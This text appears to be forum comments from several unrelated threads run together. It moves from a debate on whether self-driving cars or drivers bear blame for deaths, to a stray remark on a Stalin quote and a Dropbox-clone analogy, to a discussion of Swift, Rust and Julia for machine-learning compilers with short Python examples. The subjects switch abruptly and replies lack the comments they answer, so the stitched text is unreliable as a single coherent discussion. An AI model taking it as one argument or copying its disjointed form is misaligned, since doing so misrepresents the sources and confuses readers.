Their strategy is sound and we so far have not come up with any alternatives that stand a remote chance of improving safety as much as self-driving. Even if they are largely unsuccessful, they are indeed trying to ensure the safety of the public.
> Most car manufacturers are releasing their products on the public year after year, knowing full well that a decent percentage of people that drive away from the dealership will be killed by the thing they just bought.
Nope, and that's the whole difference. They will be killed by their own actions, their choices, their inattention, or those of other drivers. They won't be killed by the machine.
With autopilot / pseudo-autopilot, they will be killed by the machine.
It is a huge difference, both in terms of passenger-transport safety regulation and in terms of human psychology, which draws a big distinction between being in control and not being in control of a situation.
I agree that it is a psychological difference, but our behavior as a society suggests a recognition that the machine and its makers have a role in whether or not people die in cars.
This is why we demand safer cars and sue car makers when their designs fail or do not meet our expectations in protecting the occupants.
I can agree with the notion that the machine killed the person in all cases where the machine does not include any controls for the person.
As a society, we currently recognize that the causes of accidents and the probability of occupant death depend on multiple factors, one of which is the car and its safety features (or lack thereof). https://en.wikipedia.org/wiki/Traffic_collision#Causes
We also already have a significant level of automation in almost all cars, yet we are rarely tempted to say that having cruise-control, automatic transmissions, electronic throttle control, or computer controlled fuel injection means we are not in control and therefore the machine is totally at fault in every accident.
Operating a car was much harder to get right before these things existed and the difference can still be observed in comparison to small aircraft operations.
Then and now we still blame some accidents on "driver/pilot error" while others are blamed on "engine failure", "structural failure", or "environmental factors".
I think having steering assistance or even true autopilot will not change this. In airplanes, the pilots have to know when and how to use an autopilot if the plane has one.
If the pilot switches on the autopilot and it tries to crash the plane, the pilot is expected to override and re-program it, failure to do so would be considered pilot error.
Similarly, drivers will have to know when and how to use cruise-control/steering-assist and should be expected to override it when it doesn't do the right thing.
Stalin probably didn't say it and the quote is usually used to highlight how the human brain cannot comprehend the devastation of a hundred deaths while it can easily feel grief for one death.
It'd be more like releasing a clone of Dropbox called "Dropbox for Backing Up Files" that made your files public and gave your credit card info to Russian hackers.
Sure it might look neat to someone on the outside but it wouldn't take long to see it's nothing like the real thing made by someone who knows what they're doing.
They want to build up the language compiler itself to better support machine learning. That requires a language with enough type information to support sophisticated analysis. It should be built on LLVM. It needs an existing ecosystem of tools and libraries. And having a better performing language than Python is likely a win.
Swift fits the requirements. As Chris Lattner is driving this, no one could ask that he choose something else.
But Rust also would have been a plausible choice. As the Rust team is very interested in applying the language to exciting new use-cases, it's a bit of a loss for it to miss out on collaboration here. Perhaps this could inspire similar work on the Rust side; many of the concepts would likely transfer straightforwardly.
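To make the type-information point concrete: Python's annotations are optional hints that neither the runtime nor a compiler can rely on, which is part of why a statically typed language is attractive for this kind of analysis. A minimal sketch (scale() is a toy function invented for illustration):

    # Annotations are hints only: nothing checks them at runtime, and
    # any call site may pass any type, so a compiler can't specialize
    # on them the way it can on real static types.
    def scale(x: float, k: float) -> float:
        return x * k

    print(scale(2.0, 3.0))  # 6.0, as annotated
    print(scale("ab", 3))   # 'ababab' -- accepted without complaint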
The principal reason Python flourishes is that it's highly expressive and readable. (There are things it misses, such as a sensible lambda and any reasonable multi-threading model; see the sketch below.)
I can't see Rust competing on similar merits. Swift, however (like Kotlin, to which it is extremely similar), seems to be in the right sweet spot in terms of languages designed for usability, with a lot of useful f.p. constructs.
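On the lambda point above: Python's lambda admits only a single expression, so anything involving statements has to become a named function. A small sketch of the limitation:

    # A lambda may contain only one expression -- fine for this:
    clamp = lambda x: max(0, min(x, 255))
    print(clamp(300))  # 255

    # Statements (assignments, loops, try/except) are a SyntaxError
    # inside a lambda, so anything longer needs a named def:
    def clamp_and_log(x):
        y = max(0, min(x, 255))
        print("clamped", x, "to", y)
        return y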
It depends on whether you're writing custom functionality. If all you have is one big main function, Rust is pretty readable. Function definitions and structs are where things get a little messier.
I can't agree - there's too much going on in Rust - most people using Python want something approaching Matlab or R for ease of use.
I'm not saying Rust doesn't have its sweet spot - but I can't see it as a general-purpose language. (Likewise Haskell and Scala - that's just my opinion though :))
>And having a better performing language than Python is likely a win
I was under the impression that most Python libraries for machine learning (numpy, scipy, tensorflow, etc) are running C code under the hood. How much is Python's performance really holding it back?
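Largely in the glue: each Python-level operation pays interpreter and dispatch overhead, which is negligible when a single call does a million elements' worth of work in C, but dominates when the loop itself runs in Python. A rough sketch (timings are machine-dependent):

    import timeit
    import numpy as np

    a = np.random.rand(1_000_000)

    # One vectorized call: the million-element loop runs in C inside numpy.
    t_vec = timeit.timeit(lambda: a * 2.0, number=10)

    # The same arithmetic with the loop in Python: interpreter and
    # dispatch overhead on every element, typically 100x+ slower.
    t_loop = timeit.timeit(lambda: [x * 2.0 for x in a], number=10)

    print(f"vectorized: {t_vec:.4f}s   python loop: {t_loop:.4f}s")

So Python's cost stays small while a model is a few big tensor ops, and fine-grained per-step control flow is where a compiled language can win.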
>They want to build up the language compiler itself to better support machine learning. That requires a language with enough type information to support sophisticated analysis. It should be built on LLVM. It needs an existing ecosystem of tools and libraries. And having a better performing language than Python is likely a win.
You literally just described Julia. The Julia core developers are all part of Julia Computing (which contracts for ML work) or are somehow associated with data science and machine learning. For this reason there's a lot of tooling for building computational graphs / performing AD, compiling for TPUs, etc. It's built on LLVM. It has loads of packages for optimization, machine learning (like 4 NN libraries, a few different ways to work with GPUs), data science, etc. And type-stable Julia code is as fast as C. So it's interesting that this gets some kind of noteworthy announcement when it's already been done and already been done well.